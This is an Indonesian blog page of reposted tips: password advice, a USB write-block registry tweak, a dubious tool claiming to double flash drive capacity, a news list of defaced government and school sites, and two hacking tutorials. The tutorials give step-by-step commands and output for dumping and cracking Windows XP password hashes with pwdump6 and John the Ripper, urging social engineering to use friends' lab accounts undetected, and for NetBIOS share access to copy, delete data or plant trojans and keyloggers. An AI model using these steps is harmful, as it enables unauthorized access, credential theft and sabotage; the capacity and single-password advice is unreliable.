Beruntunglah, ternyata ada banyak sistem komputer yang dilengkapi kemampuan menilai password yang kita buat. Contohnya, jika password yang kita usulkan tidak aman, komputer dapat mengatakan bahwa password Anda terlalu pendek, kombinasi password Anda buruk, password yang dibuat sama dengan username Anda, silakan ulangi lagi, dan seterusnya. Menjamin 100% bahwa password kita tidak bisa ditembus adalah tidak mungkin.

Berikut tips membuat password.
Gunakan kombinasi karakter dari huruf kecil, besar, dan karakter khusus, seperti @,#,$. Contohnya: $e@r(hEnG1N3, tr4nsmut4t10n, b@mb4ng, m45t3r, 3m1Lku, p3r(ik@n1m@n.
Gunakan batas panjang karakter secara maksimal, kalau bisa tidak kurang dari 8.
Jangan pernah memberitahukannya secara lisan (bisa jadi didengar orang lain) atau ditulis di kertas atau lewat sms. Menjadi repot atau dianggap kurang percaya dengan orang lain adalah lebih baik daripada mengizinkan orang yang meragukan untuk memasuki wilayah keamanan kita. Kecuali jika terpaksa. Jika memang perlu ditulis, simpan di tempat aman (misalnya: dompet). Tetapi kalau sudah benar-benar hafal, tulisan itu harus lekas dihancurkan/buang.
Bagi yang mempunyai hobi banyak account. Misalnya dimilist, mail, atau messeger di Yahoo, MSN, ICQ, Gmail, Frendster, Plasa, Hotmail, blogger dsb. akan menyulitkan dan menghabiskan space otak jika harus mengingat banyak password. Apalagi harus menggantinya dalam kurun waktu tertentu, mungkin akan menambah pusing dulu sebelum bekerja, apalagi jika ternyata lupa.

Solusi single-password lebih disukai karena kita tinggal mengingat satu password untuk semua account. Kelemahannya, sekali tertebak berisiko dibobol. Solusi yang lain adalah password bertingkat. Misalnya, kita buat password untuk 3 kriteria: (1) penting; (2) sedang; dan (3) tidak penting.

Jika suatu saat kita lupa password-nya kita hanya perlu mencoba mengulang password dua atau tiga kali saja langsung tembus.

Sumber : www.konek.co.cc

Mencegah copy dan cut kedalam flashdisk


Mencegah Copy atau Cut File Dari Komputer ke Flashdisk.

Disini saya memberikan sebuah tips untuk mencegah pengambilan data dari komputer anda ke flashdisk dalam arti seseorang tidak akan bisa mengambil data dari k omputer anda untuk dimasukkan ke flashdisk orang tersebut, tetapi anda tetap bisa mengambil data dari flashdisk untuk dimasukkan ke komputer anda.

Berikut langkah-langkahnya :

Masuk ke Regedit ( Tekan Tombol Windows+R lalu ketik regedit) Masuk ke HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control\
Klik kanan pada folder Control pilih New–>Key
Beri nama folder baru itu dengan “StorageDevicePolicies”
Lalu klik kanan di folder dengan nama “StorageDevicePolicies”, lalu pilih New–>Dword
Beri nama “WriteProtect
Klik 2x Dword dengan nama “WriteProtect” tersebut, lalu ganti Value Data menjadi 1
Restart Komputer anda

Untuk mengembalikan seperti semula anda tinggal mengganti Value Data dari key “WriteProtect” menjadi 0

~ Selamat Mencoba ~

Sumber : www.konek.co.cc

Cara untuk memperbesar kapasitas flashdisk


Saat ini ukuran flash disk sudah bervariasi mulai dari ukuran terkecil yaitu 1GB hingga 8GB yang terbesar saat ini. Untuk ukuran terkecil yaitu 1GB saat ini mungkin sudah jarang tersedia di pasaran karena memang karena kapasitasnya yang kecil juga dari segi harga tidak terlalu jauh berbeda dengan yang ukurannya lebih besar sehingga orang lebih cenderung memilih yang berukuran besar sekalian seperti yang berukuran 4GB.

Namun jika Anda masih memiliki flash disk yang berukuran 1 GB jangan keburu dibuang terlebih dahulu saat ingin berganti flash disk dengan ukuran yang lebih besar karena disini akan saya tunjukkan bagaimana mengubah flash disk berkapasitas 1 GB diubah menjadi berukuran 2 GB dengan mudah. Bahkan oleh yang awam sekalipun mengenai teknologi flash disk!

Pertama yang harus Anda lakukan adalah mendownload sebuah software pengubah flash disk 1GB menjadi 2GB. Download di sini.

Setelah didownload, silahkan tancap flash disk 1GB Anda ke USB computer/laptop Anda kemudian klik software yang Anda download tadi.

Setelah terbuka, pilih drive flash disk Anda kemudian klik tombol “Fix”.

Setelah itu silahkan cabut flash disk dan tancapkan kembali ke PC Anda dan lihat kapasitas barunya.

Dengan cara ini, saya berhasil mengubah kapasitas flash disk 1GB saya menjadi 2GB.

#Selamat Mencoba#

Sumber : www.konek.co.cc

Hacker rayakan dirgahayu indonesia ke-65


Ada-ada saja memang ulah para peretas dalam merayakan hari ulang tahun kemerdekaan Republik Indonesia yang ke-65. Tak tanggung-tanggung, puluhan situs internet milik Indonesia jadi korban serangan sang dedemit maya.

Menurut Irvan Nasrun, praktisi internet dan jaringan, salah satu pelaku menamakan dirinya 'H4x0r-x0x'. Aksi yang dilakukan cracker ini menyasar sejumlah web pemerintah.

"Cracker ini sudah merusak di atas 100 situs, dan menyambut HUT RI ini mereka kembali merusak yang ditujukan ke web pemerintah," ujarnya, kepada detikINET, Senin (16/8/2010).

Itu baru satu pelaku. Bahkan ada laporan lain yang masuk ke email redaksi detikINET dengan jumlah situs yang menjadi korban jauh lebih banyak. Yakni mencapai puluhan situs. Korbannya pun beragam, ada situs kementerian, sekolah, universitas, pemerintah, dan lainnya.

Tujuan dari penyerangan ini secara umum sama, yakni berdalih untuk merayakan HUT RI ke-65 sekaligus untuk memberi peringatan kepada administrator situs tersebut bahwa sistem keamanan mereka memiliki celah yang dapat diserang.

Berikut adalah daftar situs yang menjadi korban serangan:

http://www.menkokesra.go.id/

http://www.bse.kemdiknas.go.id/index.php

http://www.djpbn-jateng.go.id/

http://fs.uns.ac.id/indonesia.php

http://unj.ac.id/indonesia.php

http://el82itb.org/indonesia.htm

http://unhalu.ac.id/staff/indonesia.htm

http://www.adhiguna.ac.id/indonesia.htm

http://www.stikes-insan-seagung.ac.id/indonesia.htm

http://www.himsya.ac.id/indonesia.htm

http://www.poltekpos.ac.id/indonesia.htm

http://informatika.uin-malang.ac.id/COPYRIGHT.php

http://www.mar-eng.its.ac.id/ina/akademik/admin/foto_berita/indonesia.htm

http://kaltimprov.go.id/indonesia.php

http://pengadilan.net/indonesia.php

http://bkp.deptan.go.id/indonesia.htm

http://kemenegpora.go.id/merdeka.html

http://sifa.kemenegpora.go.id/merdeka.html

http://www.lsf.go.id/merdeka.html

http://pekalongankota.go.id/merdeka.html

http://bpphp1.dephut.go.id/merdeka.html

http://bpphp2.dephut.go.id/merdeka.html

http://bpphp3.dephut.go.id/merdeka.html

http://bpphp4.dephut.go.id/merdeka.html

http://bpphp5.dephut.go.id/merdeka.html

http://bpphp6.dephut.go.id/merdeka.html

http://bpphp8.dephut.go.id/merdeka.html

http://bpphp9.dephut.go.id/merdeka.html

http://bpphp10.dephut.go.id/merdeka.html

http://manmajenang.sch.id/files/indonesia.php

http://spma-samarinda.sch.id/indonesia.htm

http://smkn1kalasan.sch.id/merdeka.html

http://smkn1madiun.sch.id/merdeka.html

http://robbirodliyya.sch.id/merdeka.html

http://smkypesampang.sch.id/merdeka.html

http://www.smpn3kpj.sch.id/merdeka.html

http://www.majesa.sch.id/merdeka.html

http://smkypkpwk.sch.id/merdeka.html

http://smpn5cirebon.sch.id/merdeka.html

http://smpn2balen.sch.id/merdeka.html

http://smpn1oku.sch.id/merdeka.html

http://manhokut.sch.id/merdeka.html

http://mtsdarussalampkp.sch.id/merdeka.html

http://smkn1barru.sch.id/merdeka.html

http://sman3bantul.sch.id/merdeka.html

http://sman1cepu.sch.id/merdeka.html

http://smpn1piyungan-btl.sch.id/merdeka.html

http://www.smansa-mjl.sch.id/merdeka.html

http://smp1pra-bws.sch.id/merdeka.html

http://smpn13bdg.sch.id/merdeka.html

http://smpn1panumbangan.sch.id/merdeka.html

http://smpmuh-ckn.sch.id/merdeka.html

http://smkkpbe-bdg.sch.id/merdeka.html

http://sditalamysubang.sch.id/merdeka.html

http://sdnbjs2bdg.sch.id/merdeka.html

http://www.smaplusbanyuasin.sch.id/merdeka.html

http://www.smkn1samarinda.com/merdeka.html

http://akademik.sma-alirsyad-clp.sch.id/merdeka.html

http://sma-alirsyad-clp.sch.id/merdeka.html

http://www.majesa.sch.id/merdeka.html

http://www.bellarminus-bks.sch.id/merdeka.html

http://sman2-wng.sch.id/merdeka.html

http://www.sma1pekalongan.sch.id/merdeka.html

http://kimomibutik.com/admin/foto_berita/indonesia.htm

http://www.smart-v-indonesia.com/indonesia.php

http://kabar-kini.com/indonesia.htm

http://semestaberjaya.com/indonesia.php

http://tikjo.my-php.net/indonesia.php

http://www.pusatk3hiperkes.com/indonesia.htm

http://semestaberjaya.com/indonesiaku.php

sumber: detikinet.com

Hack windows XP (SP2) passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi .

Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. . Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net

Copyright 2006 foofus.net

This program is free software under the GNU

General Public License Version 2 (GNU GPL), you can redistribute it and/or

modify it under the terms of the GNU GPL, as published by the Free Software

Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS

PROGRAM. Please see the COPYING file included with this program

and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}

Key length is 16

Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :


ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::

Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::

coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::

Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::

HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::

SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt

Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])

REN123 (Administrator:2)

TEBAK (coba:2)

ADMINKE (Administrator:1)

MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!

Sumber : chaidir.wordpress.com

Remote komputer dengan netbios hacking



Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.

Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.

Langkah-langkah Netbios Hacking

Buka command Prompt, atau pada run ketik cmd kemudian enter.
Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1

Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.

C:\>net use C:\\192.168.1.100

C:\>net use D:\\192.168.1.100\SharedDocs

C:\>net use F:\\192.168.1.100\Myprint

Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.

Jika tampil pesan "The commad completed successfully", berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.

Menarik bukan?... Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew....

Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.

Selamat mencoba

Sumber : idecapung.blogspot.com
English
French
German
Spain
Italian
Dutch
Russian
Brazil
Japanese
Korean
Arabic
Chinese Simplified

Open Cbox

Updates Via E-Mail